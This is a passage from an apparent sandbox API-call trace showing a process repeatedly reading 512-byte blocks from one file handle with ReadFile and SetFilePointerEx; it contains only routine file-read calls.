lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 
[0092.947] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.947] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.948] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.948] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.948] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.948] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.948] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.948] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.948] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.949] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.949] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.949] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.949] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.949] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.949] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, 
lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.949] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.949] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.950] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.950] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.950] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.950] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.950] _get_osfhandle (_FileHandle=4) returned 0x54 
[0092.950] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.950] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.950] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.950] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.950] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.950] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.950] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.950] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.950] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.950] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.950] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.951] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.951] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.951] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.951] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, 
lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.951] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.951] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.951] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.951] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.951] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.952] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.952] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.952] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0092.952] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.952] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.952] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.952] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.952] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.952] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.952] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.952] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.952] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 
[0092.952] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.952] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.952] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.952] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.952] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.953] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.953] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.953] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.953] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.953] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.953] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.953] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.953] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.953] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.954] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.954] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.954] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.954] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.954] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.954] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.954] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.954] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.954] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.954] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.954] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.954] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.954] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.954] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, 
lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.954] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.954] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.954] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.954] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.954] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.954] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.954] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.955] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.955] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.955] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.955] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: 